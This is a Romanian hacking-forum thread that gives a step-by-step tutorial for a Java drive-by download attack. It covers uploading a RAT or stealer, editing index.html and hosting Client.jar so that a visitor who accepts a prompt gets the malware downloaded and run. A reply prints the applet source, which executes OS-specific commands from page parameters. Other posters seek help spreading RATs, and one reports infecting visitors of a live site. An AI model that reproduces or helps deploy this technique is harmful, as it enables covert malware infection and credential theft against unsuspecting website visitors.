Java-Drive-By

[sebywarlord]

Ce este Java Drive-By Download?

Este o metoda prin care atacatorul ,implementeaz? pe site-ul lui niste coduri java ?i atunci când cineva viziteaz? pagina, un executabil care poate fi un RAT, WORM sau un VIRUS este desc?rcat ?i executat în sistemul s?u, f?r? stirea lui

Download Link Aici:

Java Drive by Download.rar

Acum sa incepem:

1.Uploadeaza-ti fisierul [RAT,STEALER,WARM etc] pe un host

Hostul trebuie sa aiba download direct fara timp de asteptare

ceva de forma

http;//siteuldeupload.com/fisierulmeu.exe

Deci fara timp de asteptare sau etc,intelegeti voi

2.Acum dezarhivam arhiva JavaDriveby

Intram in ea si editam index.html

Editam index.html ca in imaginea de mai jos

inloc de

http://localhost/abc.exe

Punem link-ul de la fisierul nostru

3.Uploadati index.html si client.jar pe un host

Eu recomand

Create a Website for Free - Make a free website at T15.org

Incercati sa pacaliti victima sa intre pe site-ul creat

Atunci cand victima intra ii va aparea un request

Daca accepta , virusul v-a fii rulat pe sistemul victimei

Cum lucreaza Java Drive-by?

Ai nevoie de 3 fisiere pentru a rula java-drive-by

1.virusul tau.exe

2.Client.jar ,applet-ul java care acceseaza CMD-ul iar mai tarziu creeaza si executa fisierul winconfig.vbs

3.index.html , care incorporeaza Client.jar si codurile care trebuie scrise in winconfig.vbs

Cam atata am avut de explicat,sper ca va este de ajutor

Tutorialul nu este facut de mine, eu doar l-am tradus in limba romana

Sursa english : Java Drive by Download: Tutorial and Explanation – Kerala Cyber Force | KCF

Edited November 14, 2012 by sebywarlord

[StrXt]

Bun tutorialul dar metoda nu mai este de actualitate...

[VladX]

Totusi pentru cei mai noobi ca mine este foarte bun tutorialul.Multumesc

[GarryOne]

Bun tutorialul dar metoda nu mai este de actualitate...

de ce nu mai este de actualitate?

[Blackvein]

Este bun tutorialul! Multumim!

[lutulik]

Bun tutorialul dar metoda nu mai este de actualitate...

Cum sa nu mai fie.

Eu l-am instalat cu succes pe un site.

Am peste 200 vizitatori pe zi si merge foarte bine.

[Cheater]

Interesant cu java-drive-by este ca poti face un script simplu ce sa detecteze os-ul clientului, iar in functie de os sa descarce si sa acceseze un trojan/virus pt linux, mac, win. Tinand cont de cat de avansat e nivelul de securitate in fiecare os, si ce se poate obtine in functie de asta.

[nostradamus2012]

Salut! interesant ce spuneti, eu nu ma descurc, cine imi face si mie metoda asta sa trimit un RAT sau istealer???

[nSnoopy]

Salut! interesant ce spuneti, eu nu ma descurc, cine imi face si mie metoda asta sa trimit un RAT sau istealer???

[Tutorial] Setting Up A Java Drive By [FUD] - YouTube

Sper sa te ajute,este aproape acelasi lucru doar ca trebuie sa descarci de la link-ul din primul post.

[oul]

reupload

[sebywarlord]

Nu necesita reuplaod , eu vad ca merge linkul!

[connected]

inca e actual !

[hackerika]

Este metoda silent?

Sau cere allow la java?

edit// acum am citit mai bine si am vazut ca da...

[seby05]

unde pot gasi sursa de la Client.jar?

[M2G]

Asta e sursa:

import java.applet.Applet;
import java.io.IOException;

public class Client extends Applet
{
  public void init()
  {
    String windows1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();

    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(windows1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }

    }

    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }

    }

    if (os.indexOf("lin") >= 0)
    {
      try
      {
        Process l1 = Runtime.getRuntime().exec(linux1);
        l2 = Runtime.getRuntime().exec(linux2);
      }
      catch (IOException e)
      {
        Process l2;
        e.printStackTrace();
      }
    }
  }
}

Nu face altceva decat sa vada ce sistem de operare foloseste victima si sa lanseze scriptul aferent care e in fisierul html.

In cazul windows, se foloseste de visual basic script (vbs) pentru a downloada si rula executabilul infectat.

Edited December 23, 2012 by M2G

[jetus]

Merci pentru tutorial, problema e ca multa lume nu are java

[teko.]

mai exista o problema, pe windows 7 x64 nu merge nu laseaza exe

[bastanel]

confirm si eu cele spuse de teko+ca pe celalalt pc al meu pe windows7 de x86 mi-l vede eset-ul ca si virus

[SOkola]

Un nou link de down ar fi ok.

[sebywarlord]

Din pacate am pierdut arhiva,defapt o am prin PC dar mi-a sters antivirusul fisiere din ea....

[Avram]

Daca merge dau de baut la tot liceul

REVIN CU EDIT

[Avram]

Link Download invalid .

[Avram]

Pe ce site sa uploadez?

[lauryca]

Puteti face un reupload va rog ?

[Noname14]

Merge si pentru ppi?